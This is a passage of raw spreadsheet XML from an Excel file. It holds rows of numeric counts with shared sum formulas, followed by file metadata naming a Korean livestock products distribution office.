        <f t="shared" si="4"/>
        <v>24</v>
      </c>
      <c r="F10" s="23">
        <v>13</v>
      </c>
      <c r="G10" s="23">
        <v>11</v>
      </c>
      <c r="H10" s="113">
        <f t="shared" si="5"/>
        <v>51</v>
      </c>
      <c r="I10" s="23">
        <v>51</v>
      </c>
      <c r="J10" s="23"/>
      <c r="K10" s="113">
        <f t="shared" si="6"/>
        <v>90</v>
      </c>
      <c r="L10" s="23">
        <v>90</v>
      </c>
      <c r="M10" s="23"/>
    </row>
    <row r="11" spans="1:13" ht="15.75" customHeight="1">
      <c r="A11" s="134" t="s">
        <v>387</v>
      </c>
      <c r="B11" s="114">
        <f t="shared" si="1"/>
        <v>187</v>
      </c>
      <c r="C11" s="114">
        <f t="shared" si="2"/>
        <v>186</v>
      </c>
      <c r="D11" s="114">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="E11" s="113">
        <f t="shared" si="4"/>
        <v>71</v>
      </c>
      <c r="F11" s="23">
        <v>71</v>
      </c>
      <c r="G11" s="23"/>
      <c r="H11" s="113">
        <f t="shared" si="5"/>
        <v>79</v>
      </c>
      <c r="I11" s="23">
        <v>78</v>
      </c>
      <c r="J11" s="23">
        <v>1</v>
      </c>
      <c r="K11" s="113">
        <f t="shared" si="6"/>
        <v>37</v>
      </c>
      <c r="L11" s="23">
        <v>37</v>
      </c>
      <c r="M11" s="23"/>
    </row>
    <row r="12" spans="1:13" ht="15.75" customHeight="1">
      <c r="A12" s="134" t="s">
        <v>388</v>
      </c>
      <c r="B12" s="114">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C12" s="114">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="D12" s="114">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="E12" s="113">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="F12" s="23"/>
      <c r="G12" s="23"/>
      <c r="H12" s="113">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="I12" s="23"/>
      <c r="J12" s="23"/>
      <c r="K12" s="113">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="L12" s="23"/>
      <c r="M12" s="23"/>
    </row>
    <row r="13" spans="1:13" ht="15.75" customHeight="1">
      <c r="A13" s="134" t="s">
        <v>389</v>
      </c>
      <c r="B13" s="114">
        <f t="shared" si="1"/>
        <v>78</v>
      </c>
      <c r="C13" s="114">
        <f t="shared" si="2"/>
        <v>73</v>
      </c>
      <c r="D13" s="114">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
      <c r="E13" s="113">
        <f t="shared" si="4"/>
        <v>14</v>
      </c>
      <c r="F13" s="23">
        <v>9</v>
      </c>
      <c r="G13" s="23">
        <v>5</v>
      </c>
      <c r="H13" s="113">
        <f t="shared" si="5"/>
        <v>18</v>
      </c>
      <c r="I13" s="23">
        <v>18</v>
      </c>
      <c r="J13" s="23">
        <v>0</v>
      </c>
      <c r="K13" s="113">
        <f t="shared" si="6"/>
        <v>46</v>
      </c>
      <c r="L13" s="23">
        <v>46</v>
      </c>
      <c r="M13" s="23">
        <v>0</v>
      </c>
    </row>
    <row r="14" spans="1:13" ht="15.75" customHeight="1">
      <c r="A14" s="134" t="s">
        <v>390</v>
      </c>
      <c r="B14" s="114">
        <f t="shared" si="1"/>
        <v>69</v>
      </c>
      <c r="C14" s="114">
        <f t="shared" si="2"/>
        <v>54</v>
      </c>
      <c r="D14" s="114">
        <f t="shared" si="3"/>
        <v>15</v>
      </c>
      <c r="E14" s="113">
        <f t="shared" si="4"/>
        <v>54</v>
      </c>
      <c r="F14" s="23">
        <v>44</v>
      </c>
      <c r="G14" s="23">
        <v>10</v>
      </c>
      <c r="H14" s="113">
        <f t="shared" si="5"/>
        <v>15</v>
      </c>
      <c r="I14" s="23">
        <v>10</v>
      </c>
      <c r="J14" s="23">
        <v>5</v>
      </c>
      <c r="K14" s="113">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="L14" s="23"/>
      <c r="M14" s="23"/>
    </row>
    <row r="15" spans="1:13" ht="15.75" customHeight="1">
      <c r="A15" s="134" t="s">
        <v>391</v>
      </c>
      <c r="B15" s="114">
        <f t="shared" si="1"/>
        <v>257</v>
      </c>
      <c r="C15" s="114">
        <f t="shared" si="2"/>
        <v>251</v>
      </c>
      <c r="D15" s="114">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
      <c r="E15" s="113">
        <f t="shared" si="4"/>
        <v>33</v>
      </c>
      <c r="F15" s="23">
        <v>32</v>
      </c>
      <c r="G15" s="23">
        <v>1</v>
      </c>
      <c r="H15" s="113">
        <f t="shared" si="5"/>
        <v>98</v>
      </c>
      <c r="I15" s="23">
        <v>96</v>
      </c>
      <c r="J15" s="23">
        <v>2</v>
      </c>
      <c r="K15" s="113">
        <f t="shared" si="6"/>
        <v>126</v>
      </c>
      <c r="L15" s="23">
        <v>123</v>
      </c>
      <c r="M15" s="23">
        <v>3</v>
      </c>
    </row>
    <row r="16" spans="1:15" ht="15.75" customHeight="1">
      <c r="A16" s="134" t="s">
        <v>392</v>
      </c>
      <c r="B16" s="114">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="C16" s="114">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="D16" s="114">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="E16" s="113">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="F16" s="23"/>
      <c r="G16" s="23"/>
      <c r="H16" s="113">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="I16" s="23"/>
      <c r="J16" s="23"/>
      <c r="K16" s="113">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="L16" s="23"/>
      <c r="M16" s="23"/>
      <c r="N16" s="47"/>
      <c r="O16" s="48"/>
    </row>
  </sheetData>
  <sheetProtection/>
  <mergeCells count="6">
    <mergeCell ref="A1:D1"/>
    <mergeCell ref="K3:M3"/>
    <mergeCell ref="A3:A4"/>
    <mergeCell ref="B3:D3"/>
    <mergeCell ref="E3:G3"/>
    <mergeCell ref="H3:J3"/>
  </mergeCells>
  <printOptions horizontalCentered="1" verticalCentered="1"/>
  <pageMargins left="1.141732283464567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축산물유통과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조재성</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>USER</cp:lastModifiedBy>
  <cp:lastPrinted>2013-12-02T06:38:16Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2001-11-02T05:50:12Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-02-11T08:05:09Z</dcterms:modified>
  <cp:category/>
  <cp:version/>
  <cp:contentType/>
  <cp:contentStatus/>
</cp:coreProperties>
</file>